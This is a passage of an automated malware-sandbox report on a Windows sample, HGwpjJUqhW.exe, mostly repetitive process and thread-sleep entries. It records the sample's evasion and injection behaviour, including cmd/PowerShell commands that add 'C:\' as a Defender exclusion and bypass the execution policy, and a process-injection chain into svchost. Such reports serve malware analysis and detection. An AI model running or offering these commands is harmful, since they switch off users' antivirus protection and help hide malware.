                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00D8B928 rdtsc 11_2_00D8B928
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6328Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3479Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeWindow / User API: threadDelayed 1181Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeWindow / User API: threadDelayed 3398Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeWindow / User API: threadDelayed 4485Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5021Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 508Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7398Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1878Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4047
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2368
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-10435
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\pc_yyb_2700200680_installer[1].exeJump to dropped file
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeDropped PE file which has not been started: C:\Users\user\Downloads\pc_yyb_2700200680_installer.exeJump to dropped file
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_5-43837
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_5-43839
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep count: 6328 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep count: 3479 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 3168Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 7544Thread sleep count: 271 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 7484Thread sleep count: 1181 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 7484Thread sleep time: -1181000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 7528Thread sleep count: 3398 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 7528Thread sleep time: -33980s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 7484Thread sleep count: 4485 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe TID: 7484Thread sleep time: -4485000s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep count: 5021 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep count: 508 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep count: 7398 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep count: 1878 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5868Thread sleep count: 4047 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5868Thread sleep count: 2368 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3720Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep count: 236 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3220Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeThread sleep count: Count: 3398 delay: -10Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_036280F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,5_2_036280F0
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03625430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,5_2_03625430
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeThread delayed: delay time: 30000Jump to behavior
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: !Datacenter without Hyper-V (core)
                              Source: HGwpjJUqhW.exe, 00000005.00000002.4132644653.00000000009E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: without Hyper-V for WESS
                              Source: powershell.exe, 0000000B.00000002.1789380483.00000000047C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: Datacenter without Hyper-V
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: !Enterprise without Hyper-V (core)
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: Datacenter without Hyper-V (core)
                              Source: powershell.exe, 0000000B.00000002.1789380483.00000000047C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                              Source: HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, HGwpjJUqhW.exe, 00000000.00000002.2089647965.0000000000AAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: Standard without Hyper-V
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: Enterprise without Hyper-V (core)
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: Enterprise without Hyper-V
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: Standard without Hyper-V (core)
                              Source: powershell.exe, 0000000B.00000002.1789380483.00000000047C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: HPC Edition without Hyper-V
                              Source: HGwpjJUqhW.exe, 00000005.00000002.4132644653.00000000009E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: HGwpjJUqhW.exe, HGwpjJUqhW.exe.0.drBinary or memory string: Hyper-V Server
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeAPI call chain: ExitProcess graph end nodegraph_5-43454
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_10016A5E IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10016A5E
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0363054D VirtualProtect ?,-00000001,00000104,?5_2_0363054D
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03627490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,5_2_03627490
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_02620AE4 mov eax, dword ptr fs:[00000030h]0_2_02620AE4
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02880AE4 mov eax, dword ptr fs:[00000030h]5_2_02880AE4
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_034A00CD mov eax, dword ptr fs:[00000030h]5_2_034A00CD
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03626790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,5_2_03626790
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_10016D55 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10016D55
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeCode function: 0_2_02636D2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_02636D2C
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0362DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,5_2_0362DF10
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_0362F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0362F00A
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_03631F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_03631F67
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02C36815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_02C36815
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_02C38587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_02C38587

                              HIPS / PFW / Operating System Protection Evasion

                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: 5_2_036277E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,5_2_036277E0
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe5_2_036277E0
                              Source: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe5_2_036277E0
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe "C:\Users\user\AppData\Roaming\HGwpjJUqhW.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\HGwpjJUqhW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                              Source: HGwpjJUqhW.exe, 00000005.00000002.4139344582.0000000003904000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
                              Source: HGwpjJUqhW.exe, 00000005.00000003.2138397079.00000000046C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .168.2.4 0 min472847Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
